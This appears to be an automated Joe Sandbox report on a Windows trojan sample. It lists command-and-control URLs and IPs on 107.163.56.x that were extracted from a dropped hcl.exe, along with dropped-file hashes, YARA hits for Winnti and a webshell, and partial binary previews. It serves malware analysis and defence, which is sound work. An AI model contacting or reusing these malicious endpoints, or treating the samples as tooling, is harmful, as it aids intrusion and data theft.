http://blog.sina.com.cn/u/5762479093.	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpeB	100%	Avira URL Cloud	malware
http://107.163.56.232:18963/main.phpni	100%	Avira URL Cloud	malware
http://107.163	0%	Virustotal		Browse
http://107.163	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/5762479093niE	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.php;	100%	Avira URL Cloud	malware
http://blog.sina.com.cn/u/5762479093k	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpl4w	100%	Avira URL Cloud	malware
http://107.163.56.232:18963/main.phpw	100%	Avira URL Cloud	malware
http://blog.sina.com.cn/u/5762479093)	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpl4-	100%	Avira URL Cloud	malware
http://blog.sina.com.cn/u/5762479093_	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/5762479093	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/5762479093e	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/5762479093$	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpz	100%	Avira URL Cloud	malware
http://ctldl.wP	0%	Avira URL Cloud	safe
http://107.163.56.231:18530/	100%	Avira URL Cloud	malware
http://blog.sina.com.cn/u/5762479093#	0%	Avira URL Cloud	safe
http://107.163.56.110:18530/u1129.html	100%	Avira URL Cloud	malware
http://107.163.56.232:18963/main.phpl4	100%	Avira URL Cloud	malware
http://blog.sina.com.cn/u/5762479093i(&	0%	Avira URL Cloud	safe
http://107.16	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpE&	100%	Avira URL Cloud	malware
http://blog.sina.com.c18963/main.php	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/576247909384	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.php_	100%	Avira URL Cloud	malware
http://blog.sina.com.cn/u/5762479093M	0%	Avira URL Cloud	safe
http://blog.sina.com.cn/u/5762479093ni	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpl4S	100%	Avira URL Cloud	malware
http://107.163.56.232:18963/main.php	100%	Avira URL Cloud	malware
http://blog.sina.com.c	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpnif&~d	100%	Avira URL Cloud	malware
http://107.163.56.232:18963/main.phpS	100%	Avira URL Cloud	malware
http://blog.sina.com.cn/u/5762479093S	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpC:	100%	Avira URL Cloud	malware
http://107.163.56.110:18530/u1129.htmlIE	100%	Avira URL Cloud	malware
http://107.163.56.232:18963/main.phpe	100%	Avira URL Cloud	malware
http://107.163.56.232:18963/main.php-	100%	Avira URL Cloud	malware
http://107.163.56.232:18963/main.php.	100%	Avira URL Cloud	malware
http://107.163.56.232:n/u/5762479093	0%	Avira URL Cloud	safe
http://107.163.56.231:18530//joy.asp?sid=rungnejcodyYreveFe5vteX8v2LUicbtudb8mtiWmZiZmte	100%	Avira URL Cloud	malware
http://blog.sina.com.cn/u/5762479093z	0%	Avira URL Cloud	safe
http://107.163.56.232:18963/main.phpk	100%	Avira URL Cloud	malware
http://107.163.56.232:18963/main.phpanifests	100%	Avira URL Cloud	malware
http://blog.sina.com.cn/u/5762479093q&Kd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
blogx.sina.com.cn	202.108.0.52	true	false	0%, Virustotal, Browse	unknown
blog.sina.com.cn	unknown	unknown	false	0%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://107.163.56.232:18963/main.phpeB	hcl.exe, 00000005.00000003.505645297.0000000002E85000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://blog.sina.com.cn/u/5762479093.	hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.469390389.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163	hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	low
http://107.163.56.232:18963/main.phpni	hcl.exe, 00000005.00000003.469390389.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://blog.sina.com.cn/u/5762479093niE	hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.php;	hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://107.163.56.232:18963/main.phpl4w	hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://blog.sina.com.cn/u/5762479093k	hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpz	hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://blog.sina.com.cn/u/5762479093)	hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpw	hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ctldl.wP	hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpl4-	hcl.exe, 00000005.00000003.505645297.0000000002E85000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://107.163.56.110:18530/u1129.html	hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://blog.sina.com.cn/u/5762479093_	hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5762479093	hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpl4	hcl.exe, 00000005.00000003.505645297.0000000002E85000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://107.16	hcl.exe, 00000005.00000002.525969199.000000000573E000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://blog.sina.com.cn/u/5762479093$	hcl.exe, 00000005.00000002.526057154.0000000005B5C000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.231:18530/	hcl.exe, 00000005.00000002.527979473.0000000010012000.00000004.00000001.01000000.00000006.sdmp	true	Avira URL Cloud: malware	unknown
http://blog.sina.com.cn/u/5762479093e	hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpE&	hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://blog.sina.com.cn/u/5762479093#	hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.c18963/main.php	hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5762479093i(&	hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.php_	hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://107.163.56.232:18963/main.phpl4S	hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://blog.sina.com.cn/u/576247909384	hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5762479093M	hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.phpC:	hcl.exe, 00000005.00000002.526014230.00000000059DA000.00000004.00000010.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.525980892.00000000057BE000.00000004.00000010.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://blog.sina.com.c	hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5762479093ni	hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.469390389.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.php	hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://107.163.56.232:18963/main.phpS	hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://107.163.56.232:18963/main.phpnif&~d	hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://blog.sina.com.cn/u/5762479093S	hcl.exe, 00000005.00000003.505645297.0000000002E85000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.110:18530/u1129.htmlIE	hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://107.163.56.232:n/u/5762479093	hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://blog.sina.com.cn/u/5762479093q&Kd	hcl.exe, 00000005.00000002.524951045.0000000002E2E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.232:18963/main.php-	hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.409124238.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://107.163.56.232:18963/main.php.	hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://107.163.56.232:18963/main.phpk	hcl.exe, 00000005.00000003.417079676.0000000002E89000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.399080759.0000000002E89000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://blog.sina.com.cn/u/5762479093z	hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366452234.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.366651753.0000000002E88000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.56.231:18530//joy.asp?sid=rungnejcodyYreveFe5vteX8v2LUicbtudb8mtiWmZiZmte	hcl.exe, 00000005.00000002.524951045.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://107.163.56.232:18963/main.phpe	hcl.exe, 00000005.00000002.524951045.0000000002E70000.00000004.00000020.00020000.00000000.sdmp, hcl.exe, 00000005.00000003.442859978.0000000002E79000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://107.163.56.232:18963/main.phpanifests	hcl.exe, 00000005.00000003.434229610.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
202.108.0.52	blogx.sina.com.cn	China	4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
107.163.56.232	unknown	United States	20248	TAKE2US	true
107.163.56.231	unknown	United States	20248	TAKE2US	true
107.163.56.110	unknown	United States	20248	TAKE2US	true
107.163.56.251	unknown	United States	20248	TAKE2US	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	801466
Start date and time:	2023-02-08 11:57:33 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	02hNixBIvP.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/4@23/6
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 19.4% (good quality ratio 17.1%) Quality average: 65.1% Quality standard deviation: 31.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 16 Number of non-executed functions: 51
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
11:58:36	API Interceptor	1496x Sleep call for process: hcl.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
202.108.0.52	5jme4p7u76.exe	Get hash	malicious	Browse	blog.sina.com.cn/u/5655029807
107.163.56.232	abc.dll	Get hash	malicious	Browse
107.163.56.231	abc.dll	Get hash	malicious	Browse
107.163.56.110	abc.dll	Get hash	malicious	Browse
107.163.56.251	abc.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
blogx.sina.com.cn	5jme4p7u76.exe	Get hash	malicious	Browse	202.108.0.52
	abc.dll	Get hash	malicious	Browse	123.126.45.92
	dgrep.exe	Get hash	malicious	Browse	218.30.115.123

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	hfenAjxOo1.elf	Get hash	malicious	Browse	210.74.100.188
	e5A3ahhY01.elf	Get hash	malicious	Browse	180.88.226.78
	E7DP3Xaucg.elf	Get hash	malicious	Browse	140.210.150.54
	pyPAkdf3kH.elf	Get hash	malicious	Browse	106.3.154.201
	wjTYV0TApD.elf	Get hash	malicious	Browse	124.202.20.71
	fWikJEXL2p.elf	Get hash	malicious	Browse	124.200.31.63
	BLBq6xYqWy.elf	Get hash	malicious	Browse	61.51.102.45
	x7fAEpfwHh.elf	Get hash	malicious	Browse	219.158.239.41
	AGO1bYmmly.elf	Get hash	malicious	Browse	118.26.69.95
	b2k0iMYyrw.elf	Get hash	malicious	Browse	111.192.240.111
	Q5GN0fA8VQ.elf	Get hash	malicious	Browse	123.126.151.121
	jg3bfp1svi.elf	Get hash	malicious	Browse	114.253.160.47
	DpSVpwrnwp.elf	Get hash	malicious	Browse	114.253.74.228
	JRNBd1M56V.elf	Get hash	malicious	Browse	114.248.234.39
	huAogaUK7o.elf	Get hash	malicious	Browse	115.34.186.203
	iHNnlVPvr3.elf	Get hash	malicious	Browse	118.144.241.15
	ScBr_x86_64	Get hash	malicious	Browse	210.14.158.178
	WQi2YD6hQR.elf	Get hash	malicious	Browse	220.207.252.59
	jFnt4ojid1.elf	Get hash	malicious	Browse	111.193.72.64
	xQkwpkg5p7.elf	Get hash	malicious	Browse	218.247.179.219

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files\lhnfbdjfh\hcl.exe	QdRsIGxEq1.exe	Get hash	malicious	Browse
	NDA Example 2023.img	Get hash	malicious	Browse
	KYC_ZE72(Dec15).html	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Jaik.46772.28250.19063.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Jaik.46772.16628.7980.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Jaik.46772.13360.18168.dll	Get hash	malicious	Browse
	rxOMvar9S1.html	Get hash	malicious	Browse
	mhWffYIn4s.dll	Get hash	malicious	Browse
	Scan_Document3751-(Nov8).img	Get hash	malicious	Browse
	Document_2930#Nov10.html	Get hash	malicious	Browse
	Document_8280#Nov10.html	Get hash	malicious	Browse
	imguser.dll	Get hash	malicious	Browse
	imgengine.dll	Get hash	malicious	Browse
	Scan_Document4852-(Nov8).img	Get hash	malicious	Browse
	personal_data#6509.html	Get hash	malicious	Browse
	Invoice_3371_October-25.html	Get hash	malicious	Browse
	Invoice_2873_October-25.html	Get hash	malicious	Browse
	Invoice_5694_October-25.html	Get hash	malicious	Browse
	Invoice_6546_October-25.html	Get hash	malicious	Browse
	Invoice_9844_October-25.html	Get hash	malicious	Browse

Created / dropped Files

C:\1.txt

Download File

Process:	C:\Program Files\lhnfbdjfh\hcl.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	377
Entropy (8bit):	4.220883753079589
Encrypted:	false
SSDEEP:	6:yFddknBIvMz/PMEaWlVIKXFooKWDrrWRaM:8dd8BTz/XlwWD/M
MD5:	FD2B0548ED20D1BE1EB9A6B9666F7F17
SHA1:	9B62932BDAD02E05CA8AB1153D3A9C95D42812DA
SHA-256:	8A139775391E7727E79967866C696B648EE2BFBB5D2237670233EDDC06891AF5
SHA-512:	FCC8CD01152256B0117FD8AFE8B7E80CCABB09056BEFA614F88060A713FFB105D9A815830971D62EDC3231563BA6C6B9D56E694D6087B7D0A0F8DB9B7DA77C92
Malicious:	false
Preview:	..2023-02-10 08:29..iOffset....2023-02-12 01:15..iOffset....2023-02-13 11:11..iOffset....2023-02-15 04:12..iOffset....2023-02-16 02:10..iOffset....2023-02-17 08:06..iOffset....2023-02-18 06:29..iOffset....2023-02-19 22:54..iOffset....2023-02-20 10:58..iOffset....2023-02-22 00:24..iOffset....2023-02-23 19:09..iOffset....2023-02-25 00:31..iOffset....2023-02-25 21:49..iOffset..

C:\Program Files\lhnfbdjfh\hcl.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\ifaie.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	61952
Entropy (8bit):	6.1891584557780455
Encrypted:	false
SSDEEP:	768:vV+4s9C36jbgktDymekZ+bRnbSEln5IyYpamDjobj8S47:vc8ms1mibRJln5IUmDjoX07
MD5:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
SHA1:	BCC5DC3222034D3F257F1FD35889E5BE90F09B5F
SHA-256:	4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE
SHA-512:	85C94763698448275AD996805FD59A3A4789BEFB79BE2175E2BBFED1CE9A2D424500DCAF42FFA225C33FE7090F0FEDF6B7BED63168FEC64D112CD09559829AFE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: QdRsIGxEq1.exe, Detection: malicious, Browse Filename: NDA Example 2023.img, Detection: malicious, Browse Filename: KYC_ZE72(Dec15).html, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Jaik.46772.28250.19063.dll, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Jaik.46772.16628.7980.dll, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Jaik.46772.13360.18168.dll, Detection: malicious, Browse Filename: rxOMvar9S1.html, Detection: malicious, Browse Filename: mhWffYIn4s.dll, Detection: malicious, Browse Filename: Scan_Document3751-(Nov8).img, Detection: malicious, Browse Filename: Document_2930#Nov10.html, Detection: malicious, Browse Filename: Document_8280#Nov10.html, Detection: malicious, Browse Filename: imguser.dll, Detection: malicious, Browse Filename: imgengine.dll, Detection: malicious, Browse Filename: Scan_Document4852-(Nov8).img, Detection: malicious, Browse Filename: personal_data#6509.html, Detection: malicious, Browse Filename: Invoice_3371_October-25.html, Detection: malicious, Browse Filename: Invoice_2873_October-25.html, Detection: malicious, Browse Filename: Invoice_5694_October-25.html, Detection: malicious, Browse Filename: Invoice_6546_October-25.html, Detection: malicious, Browse Filename: Invoice_9844_October-25.html, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...o...l...h..l..m.o.l...m..l...i..l...e...l....l...n..l.Rich.l.................PE..L...4^?..................b..........Pa............@..........................@............@.............................................hg...................0..D.......T........................... .......................lm..`....................text....a.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat..............................@....rsrc...hg.......h..................@..@.reloc..D....0......................@..B................................................................................................................................................................................................................................................................................

C:\Program Files\lhnfbdjfh\hclyc.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\ifaie.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	192637
Entropy (8bit):	7.653414219548302
Encrypted:	false
SSDEEP:	3072:OvQ/fUx411ZxIBgDIuZmKeJpj7gC/2Eys5UXQ/ARHrHVxUo++BPO1fQDfPpFvOqG:qecxGZxIBzu4KgpfL/LpiXQ/ur1SoLOp
MD5:	C97302177183954E108B22356C7D2E62
SHA1:	8B6D658AF931A4518D60EDD775908C5FB0A9387C
SHA-256:	14370B5EDDED083B37AC7BAA9EFECCF32B61F11F1A364433530F2B28A2E3271B
SHA-512:	41319709B7C756EFA22FC92C4290794DAA0FCBF1801B115284F024CDEBCEED71B1EC5D86C070FD48F3225DF49A8D97CBD9B31573C1471DB65F40DA7E1FD40B44
Malicious:	true
Yara Hits:	Rule: Winnti_NlaifSvc, Description: Winnti sample - file NlaifSvc.dll, Source: C:\Program Files\lhnfbdjfh\hclyc.dll, Author: Florian Roth (Nextron Systems)
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... B..N...N...N...B...N.F.....N.......N.......N.......N...@...N.m.D...N...O.^.N.m.E...N.=.H...N.m.J...N.Rich..N.........................PE..L...+Y`V...........!................k........................................0..........................................a............ ..........................d....................................................................................text............................... ..`.rdata..k5..........................@..@.data...._... ......................@....oo0................................`..`.oo1.........P......................`....reloc..d...........................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ifaie.exe

Download File

Process:	C:\Users\user\Desktop\02hNixBIvP.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	272305
Entropy (8bit):	7.908450866149964
Encrypted:	false
SSDEEP:	6144:OK+/nlJyamKOrllFIFkRqqfc+MYCvNxrQWSF4:Ejy3PLIF3qU+lOxrb
MD5:	A14885E3017A4DDC08143092526DFC7B
SHA1:	3C2765C4AB46146505C5C435BEE7F458E8124D0E
SHA-256:	B45DCC5406B03A44B6CB98709008892FF26EF2F60DC0910C3E915DD870169F58
SHA-512:	001979D6B054DF77B90280DEC33295CF87C85C3CD66C4FBDB41898F272467954A1FDFB29023E0E9C9F2D5D1DD57A0A1AB1D7E76C2817C620C7C74336F935EDE6
Malicious:	true
Yara Hits:	Rule: CN_Honker_Webshell, Description: Sample from CN Honker Pentest Toolset - file Webshell.exe, Source: C:\Users\user\AppData\Local\Temp\ifaie.exe, Author: Florian Roth (Nextron Systems)
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]e.......................$......Rich............PE..L....\`V.............................]............@.........................................................................jh..(.......t7..........................................................................................................DINGBOY............................. ...DINGBOY............................. ............P..$..?T....~2y....%s.)...!..A.m...Q.YO.z\|#.).l\.;5......./wT..U.Kv.<..g...$`}`M.x..F..u..MfQO..K.~..B....3ebtU.....:......=`S..Y.i.#.0..Id...........jmA....@S.o.n&..s(.........K>..(..w.+!+..z...).r@......y!..\..N.R..'(i..E[..x..d..._'..g.......$.9..t6...-u.d...B.W#Hy..yUr..S...T.F.. \. .D@.`....w.0....E....5..$s.E7..{..g.:].[}...}.<.g?.C.W....o.#..Z...../.D.....C.0(...M^.... .F.I-w...V..?..0........l.+X......l....A...g.......C.r..sBH.w...5.x.U.[x.ws

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.908307802122323
TrID:	Win32 Executable (generic) a (10002005/4) 99.70% Win32 EXE Yoda's Crypter (26571/9) 0.26% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	02hNixBIvP.exe
File size:	272037
MD5:	003f93a1f33ec617b46a87c98b19fd85
SHA1:	cebe846ccb643f8f843206d52cd701b02c1708f3
SHA256:	3c096962f3f447b1a0d136c730f0d979faafb01f22eddedccfc801bc167e0925
